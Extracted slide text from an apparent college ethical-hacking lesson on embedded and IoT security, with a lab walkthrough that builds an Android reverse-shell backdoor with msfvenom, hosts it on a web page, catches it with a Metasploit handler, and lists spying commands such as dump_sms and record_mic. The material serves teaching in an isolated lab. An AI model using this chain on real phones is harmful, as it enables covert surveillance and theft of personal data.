CIS 76 - Lesson 11: Rich's Lesson Module Checklist
CIS 76 - Lesson 11: Rich's Lesson Module Checklist
Flash cards
Properties
Page numbers
1st minute quiz
Web Calendar summary
Web book pages
Commands
1
CIS 76 - Lesson 11
Evading Network
TCP/IP
Devices
Cryptography Network and
Computer Attacks
Embedded Operating
Enumeration
Systems
Desktop and Server Scripting and
Vulnerabilities Programming
1. Browse to:
http://simms-teach.com
2. Click the CIS 76 link.
3. Click the Calendar link.
4. Locate today’s lesson.
5. Find the Presentation slides for
the lesson and download for
easier viewing.
6. Click the Enter virtual classroom
link to join CCC Confer.
7. Log into Opus with Putty or ssh
command.
4
CIS 76 - Lesson 11
3) Click OK button.
[ ] Is recording on?
Should change
Red dot means recording from phone
handset icon to
little Microphone
[ ] Use teleconferencing, not mic icon and the
Teleconferencing …
Should be grayed out message displayed
7
CIS 76 - Lesson 11
vSphere Client
putty
[ ] Video (webcam)
[ ] Make Video Follow Moderator Focus
9
CIS 76 - Lesson 11
Quite interesting
that they consider
you to be an
Elmo rotated down to view side table
"expert" in order to
use this button!
Rotate
image
button Elmo rotated up to view white board
Rotate
image
button
Control Panel (small icons) General Tab > Settings… 500MB cache size Delete these
11
CIS 76 - Lesson 11
Start
12
CIS 76 - Lesson 11
Sound Check
Students that dial-in should mute their
line using *6 to prevent unintended
noises distracting the web conference.
Dave R.
Email me ([email protected]) a relatively current photo of your face for 3 points extra credit
CIS 76 - Lesson 11
are. • Questions
• In the news
• Describe various embedded operating systems
• Best practices
in use today.
• Housekeeping
• Identify ways to protect embedded operating
• Embedded systems
systems.
• Enterprise IoT Risk Report
• Industrial Control Systems
• Hacking a webcam (work in progress)
• Hacking Android
• Assignment
• Wrap up
16
CIS 76 - Lesson 11
Admonition
17
Shared from cis76-newModules.pptx
CIS 76 - Lesson 11
Questions
19
CIS 76 - Lesson 11
Questions
How this course works?
Previous labs?
他問一個問題,五分鐘是個傻子,他不問一個問題仍然是一個
Chinese 傻瓜永遠。
Proverb He who asks a question is a fool for five minutes; he who does not ask a question
remains a fool forever.
20
CIS 76 - Lesson 11
Shutdown all:
EH-WinXP VMs
EH-OWASP VMs
21
CIS 76 - Lesson 11
In the
news
22
CIS 76 - Lesson 11
Recent news
23
CIS 76 - Lesson 11
Recent news
Recent news
Recent news
26
*See 2014 FireEye report on APT 28 here: https://www2.f ireeye.com/CO N-A CQ-RP T-A PT28_LP .html
CIS 76 - Lesson 11
More on APT 28
27
CIS 76 - Lesson 11
Recent news
Fake office printer hijacks cell phone connection
http://arstechnica.com/information-technology/2016/11/this-evil-
office-printer-hijacks-your-cellphone-connection/
Recent news
No more "red purses" in Chrome
https://www.wired.com/2016/11/googles-chrome-hackers-flip-
webs-security-model/
Chrome
security
team
Recent news
Mirai botnet attacks an entire country
http://www.forbes.com/sites/leemathews/2016/11/03/so http://www.esecurityplanet.com/network-
meone-just-used-the-mirai-botnet-to-knock-an-entire- security/massive-ddos-attacks-disable-internet-access-
country-offline/ throughout-liberia.html/
• The Mirai botnet first attacked security expert Brian Kreb's website
(620 Gbps of traffic).
• Then it attacked the Dyn DNS servers knocking out access to a
number of major websites (1200 Gbps of traffic).
• Now it was used against Liberia, population 4.5 million (500 Gbps of
traffic) bringing about service interruptions for a day.
30
CIS 76 - Lesson 11
Recent news
Tesco bank attack involving 40,000 accounts
https://http://www.bbc.com/new https://www.theguardian.com/money/2016/nov/07/tesco -bank-
fraud-key-questions-answered-suspicious-transactions-40000-
s/technology-37896273/ accounts/
31
CIS 76 - Lesson 11
Recent news
China passes controversial cybersecurity law
http://computerworld.com/article/3138951/security/china-passes-controversial-cybersecurity-law.html/
http://www.reuters.com/article/us-china-parliament-cyber-idUSKBN132049
Best
Practices
33
CIS 76 - Lesson 11
http://www.bbc.com/news/technology-37896273
http://thehackernews.com/2016/10/ddos-attack-mirai-iot.html
35
CIS 76 - Lesson 11
Housekeeping
36
CIS 76 - Lesson 11
Housekeeping
3. You can still send me your photo for our class page if you
want 3 points extra credit.
37
CIS 76 - Lesson 11
Extra credit
labs and
Thur final posts
due by
11:59PM
• All students will take the test at the same time. The test must be
completed by 6:50PM.
• Working and long distance students can take the test online via
CCC Confer and Canvas.
• Working students will need to plan ahead to arrange time off from
work for the test.
39
• Test #3 is mandatory (even if you have all the points you want)
CIS 76 - Lesson 11
40
CIS 76 - Lesson 11
43
CIS 76 - Lesson 11
Red Pod
Blue Pod
Embedded
Systems
45
CIS 76 - Lesson 11
46
CIS 76 - Lesson 11
http://news.thewindowsclub.com/microsoft-unveils-windows-embedded-8-1-download-industry-release-preview-now-64071/ 49
CIS 76 - Lesson 11
Windows XP Embedded
50
CIS 76 - Lesson 11
Embedded Windows Family for Medical Products
51
http://ocs.arrow.com/msembedded/medical/
CIS 76 - Lesson 11
http://www.windriver.com/customers/ 52
CIS 76 - Lesson 11
http://www.ghs.com/CustomerGallery.html 53
CIS 76 - Lesson 11
QNX
QNX OS and QNX Neutrino RTOS
https://www.qnx.com/ 54
CIS 76 - Lesson 11
Siemens
SIMATIC PCS 7
55
CIS 76 - Lesson 11
IoT Risk
Report
56
CIS 76 - Lesson 11
https://www.scribd.com/document/328841509/Hackable-devices 57
CIS 76 - Lesson 11
https://www.youtube.com/watch?v=CeTILnlh2ek&feature=youtu.be
58
CIS 76 - Lesson 11
Industrial
Control
Systems
59
CIS 76 - Lesson 11
60
CIS 76 - Lesson 11
https://instrumentsignpost.files.wordpress.com/2012/02/sanscybersecurityposter.jpg 61
Idaho National Lab Aurora Demonstration
https://www.youtube.com/watch?v=fJyWngDco3g
STUXNET
https://sharkscale.wordpress.com/2016/02/06/defending-against-stuxnet/
CIS 76 - Lesson 11
Hacking a
Webcam
Work in Progress
68
CIS 76 - Lesson 11
D-Link 933L
Power LED
Reset hole
WPS (WiFi Protected Setup)
http://us.dlink.com/products/home-solutions/day-
night-wifi-camera-dcs-933l/ 69
CIS 76 - Lesson 11
https://www.cvedetails.com/ 70
CIS 76 - Lesson 11
71
CIS 76 - Lesson 11
72
CIS 76 - Lesson 11
73
CIS 76 - Lesson 11
74
https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dcs931l_upload
CIS 76 - Lesson 11
75
CIS 76 - Lesson 11
77
CIS 76 - Lesson 11
78
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/dlink_dcs931l_upload.rb
CIS 76 - Lesson 11
79
CIS 76 - Lesson 11
80
CIS 76 - Lesson 11
81
CIS 76 - Lesson 11
82
CIS 76 - Lesson 11
83
CIS 76 - Lesson 11
84
CIS 76 - Lesson 11
Hacking an
Android Device
85
CIS 76 - Lesson 11
Shutdown all:
EH-WinXP VMs
EH-OWASP VMs
86
CIS 76 - Lesson 11
Part 1
EH-pfSense-xx
Setup DHCP
87
CIS 76 - Lesson 11
EH-pfSense-xx
88
CIS 76 - Lesson 11
EH-pfSense-xx
EH-pfSense-xx
90
CIS 76 - Lesson 11
Part 2
EH-Lolli-xx
Setup, snapshot, and
test 91
CIS 76 - Lesson 11
Android-x86 Project
Android-x86 ISOs available here
http://www.android-x86.org/ 92
CIS 76 - Lesson 11
Android-x86 Project
To make a ESXi VM use 1GB RAM, E1000 adapter, and an IDE hard drive. Make
100MB SDA partition for grub and boot files and a second SDB partition for
everything else. Install Android-x86 on the second partition. Be sure to make
the first partition bootable!
http://www.android-x86.org/download 93
CIS 76 - Lesson 11
EH-Lolli-xx
xx
3. Power up.
EH-Lolli-xx
Home button 95
CIS 76 - Lesson 11
EH-Lolli-xx
EH-Lolli-xx
ifconfig eth0
ping google.com
Ctrl-C
exit
Part 3
EH-Lolli-xx
Create some data
(to steal)
98
CIS 76 - Lesson 11
EH-Lolli-xx
Browser icon 99
CIS 76 - Lesson 11
EH-Lolli-xx
EH-Lolli-xx
EH-Lolli-xx
EH-Lolli-xx
EH-Lolli-xx
EH-Lolli-xx
105
CIS 76 - Lesson 11
Part 4
EH-Kali-xx
Create backdoor
payload
106
CIS 76 - Lesson 11
EH-Kali-xx
msfvenom
• is a payload generator.
• It replaces the older msfpayload and msfencode tools.
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
107
CIS 76 - Lesson 11
EH-Kali-xx
root@eh-kali-05:~#
This creates a "back door" payload for Android. When it runs it will
connect back to EH-Kali-05 in Pod 5 at 10.76.5.150 using port 4444.
msfvenom
• is a payload generator.
• It replaces the older msfpayload and msfencode tools.
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
108
CIS 76 - Lesson 11
Part 5
EH-Kali-xx
Make a website
109
CIS 76 - Lesson 11
EH-Kali-xx
cd /var/www/html
scp -r xxxxx76@opus:/home/cis76/depot/webpages/* .
mkdir files
cp /root/backdoor.apk files/
110
CIS 76 - Lesson 11
EH-Kali-xx
Create a files directory for the payload file then set permissions.
111
CIS 76 - Lesson 11
EH-Kali-xx
112
CIS 76 - Lesson 11
EH-Kali-xx
Part 6
EH-Kali-xx
Exploit Android
114
CIS 76 - Lesson 11
root@eh-kali-05:~# service postgresql start
root@eh-kali-05:~#
A database appears
root@eh-kali-05:~#
msfdb init
to be already configured, skipping initialization
msfconsole
EH-Kali-xx
######## #
################# #
###################### #
######################### # cd
############################ service postgresql start
##############################
############################### msfdb init
###############################
##############################
msfconsole
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### #### Start Metasploit
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.com
=[ metasploit v4.12.15-dev ]
+ -- --=[ 1563 exploits - 904 auxiliary - 269 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
EH-Kali-xx
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.76.5.150
set lport 4444
exploit
Set up a handler to listen for the "backdoor" on the Android to connect back.
116
CIS 76 - Lesson 11
Part 7
EH-Lolli-xx
Install malicious
payload 117
CIS 76 - Lesson 11
EH-Lolli-xx
120
CIS 76 - Lesson 11
123
Select File Manager
CIS 76 - Lesson 11
126
CIS 76 - Lesson 11
127
CIS 76 - Lesson 11
128
CIS 76 - Lesson 11
129
CIS 76 - Lesson 11
Part 8
EH-Kali-xx
EH-Kali-xx
meterpreter >
Once the backdoor app is opened on the Victim's Android we get a session on EH-Kali.
131
CIS 76 - Lesson 11
EH-Kali-xx
geolocate
dump_sms
webcam_stream
record_mic
EH-Kali-xx
sysinfo
meterpreter > sysinfo
Computer : localhost
OS : Android 5.1.1 - Linux 4.0.9-android-x86+ (i686)
Meterpreter : java/android
meterpreter >
133
CIS 76 - Lesson 11
ipconfig
meterpreter > ipconfig
EH-Kali-xx
Interface 1
============
Name : ip6tnl0 - ip6tnl0
Hardware MAC : 00:00:00:00:00:00
Interface 2
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 3
============
Name : sit0 - sit0
Hardware MAC : 00:00:00:00:00:00
Interface 4
============
Name : eth0 - eth0
Hardware MAC : 00:50:56:af:78:28
IPv4 Address : 10.76.5.120
IPv4 Netmask : 255.0.0.0
IPv6 Address : fe80::250:56ff:feaf:7828
IPv6 Netmask : ::
134
meterpreter >
CIS 76 - Lesson 11
EH-Kali-xx
pwd
meterpreter > pwd
/data/data/com.metasploit.stage/files
meterpreter >
135
CIS 76 - Lesson 11
meterpreter > cd /
meterpreter > ls
Listing: /
==========
cd /
ls EH-Kali-xx
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40444/r--r--r-- 0 dir 2016-11-06 15:05:08 -0800 acct
40000/--------- 80 dir 2016-11-06 15:05:20 -0800 cache
0000/--------- 0 fif 1969-12-31 16:00:00 -0800 charger
40000/--------- 40 dir 2016-11-06 15:05:08 -0800 config
40444/r--r--r-- 0 dir 2016-11-06 15:05:05 -0800 d
40000/--------- 4096 dir 2016-11-06 15:01:27 -0800 data
100444/r--r--r-- 320 fil 2016-11-06 15:05:06 -0800 default.prop
40444/r--r--r-- 3840 dir 2016-11-06 15:05:10 -0800 dev
40444/r--r--r-- 4096 dir 2015-10-06 09:52:36 -0700 etc
100444/r--r--r-- 11166 fil 2016-11-06 15:05:06 -0800 file_contexts
100000/--------- 342 fil 2016-11-06 15:05:06 -0800 fstab.android_x86
100000/--------- 850420 fil 2016-11-06 15:05:06 -0800 init
100000/--------- 5666 fil 2016-11-06 15:05:06 -0800 init.android_x86.rc
100000/--------- 1022 fil 2016-11-06 15:05:06 -0800 init.bluetooth.rc
100000/--------- 944 fil 2016-11-06 15:05:06 -0800 init.environ.rc
100000/--------- 21746 fil 2016-11-06 15:05:06 -0800 init.rc
100000/--------- 588 fil 2016-11-06 15:05:06 -0800 init.superuser.rc
100000/--------- 1927 fil 2016-11-06 15:05:06 -0800 init.trace.rc
100000/--------- 3885 fil 2016-11-06 15:05:06 -0800 init.usb.rc
100000/--------- 301 fil 2016-11-06 15:05:06 -0800 init.zygote32.rc
40444/r--r--r-- 8192 dir 2015-10-06 12:32:34 -0700 lib
40444/r--r--r-- 160 dir 2016-11-06 15:05:08 -0800 mnt
40444/r--r--r-- 0 dir 2016-11-06 15:05:05 -0800 proc
100444/r--r--r-- 2771 fil 2016-11-06 15:05:06 -0800 property_contexts
40000/--------- 140 dir 2016-11-06 15:05:06 -0800 sbin
40666/rw-rw-rw- 4096 dir 2016-11-06 14:44:45 -0800 sdcard
100444/r--r--r-- 471 fil 2016-11-06 15:05:06 -0800 seapp_contexts
100444/r--r--r-- 76 fil 2016-11-06 15:05:06 -0800 selinux_version
100444/r--r--r-- 118329 fil 2016-11-06 15:05:06 -0800 sepolicy
100444/r--r--r-- 9438 fil 2016-11-06 15:05:06 -0800 service_contexts
40444/r--r--r-- 180 dir 2016-11-06 15:05:08 -0800 storage
40444/r--r--r-- 0 dir 2016-11-06 15:05:06 -0800 sys
40444/r--r--r-- 4096 dir 1969-12-31 16:00:00 -0800 system
100444/r--r--r-- 382 fil 2016-11-06 15:05:06 -0800 ueventd.android_x86.rc
100444/r--r--r-- 4314 fil 2016-11-06 15:05:06 -0800 ueventd.rc
40444/r--r--r-- 4096 dir 2015-10-06 09:47:38 -0700 vendor
100000/--------- 113 fil 2016-11-06 15:05:08 -0800 x86.prop
EH-Kali-xx
cd /sdcard
ls
meterpreter >
137
CIS 76 - Lesson 11
EH-Kali-xx
cd Download
ls
138
CIS 76 - Lesson 11
EH-Kali-xx
pwd
ls
download images.jpg
139
CIS 76 - Lesson 11
EH-Kali-xx
140
CIS 76 - Lesson 11
Assignment
141
CIS 76 - Lesson 11
Lab 9
142
CIS 76 - Lesson 11
Wrap up
143
CIS 76 - Lesson 11
Next Class
Assignment: Check the Calendar Page on the web site to
see what is due next week.
144
CIS 76 - Lesson 11
Backup
145